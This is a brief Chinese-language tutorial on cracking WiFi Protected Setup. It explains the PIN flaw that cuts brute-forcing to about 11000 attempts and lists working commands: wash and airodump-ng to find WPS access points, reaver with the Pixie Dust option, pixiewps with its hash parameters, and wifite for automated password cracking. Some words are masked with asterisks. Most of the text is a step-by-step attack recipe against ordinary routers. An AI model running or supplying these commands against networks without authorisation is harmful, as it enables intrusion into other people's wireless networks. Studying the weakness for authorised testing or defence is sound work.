WPS 攻击

WPS WIRELESS PROTECTED SETUP
WPS是WiFi联盟开发的一项目的是既保证安全又简化接入的技术。

1. 通过PIN码来简化无线接入的操作，无需记住PSK
2. 路由器和网卡各按一个按钮就能接入无线
3. PIN码是分为前后各4位的2段共8位数字

安全漏洞

1. 接入方可以根据路由器的返回信息判断前4位是否正确
2. PIN码后4位只有1000种定义的组合
3. 所以全部穷举**只需要11000次尝试

步骤：

1. 启动侦听模式，发现支持WPS的AP

wash -F -i wlan0mon 
airodump-ng wlan0mon --wps

-F 忽略错误帧的报警

Lck 锁定机制，锁定后使用PIN机制也无法**。

2. **PIN码

reaver -i wlan0mon -b <AP mac> -vv -c 11 -K 1

-c 指定信道
-p 由pixiewps知道PIN码后可得无线密码

pixiewps

pixiewps -e <pke> -r <pkr> -s <E-hash1> -z <E-hash2> -a <Authkey> -n <e-nonce>

3. 综合自动化无线密码**工具 wifite

wifite
ctrl+c 
输入选中的NUM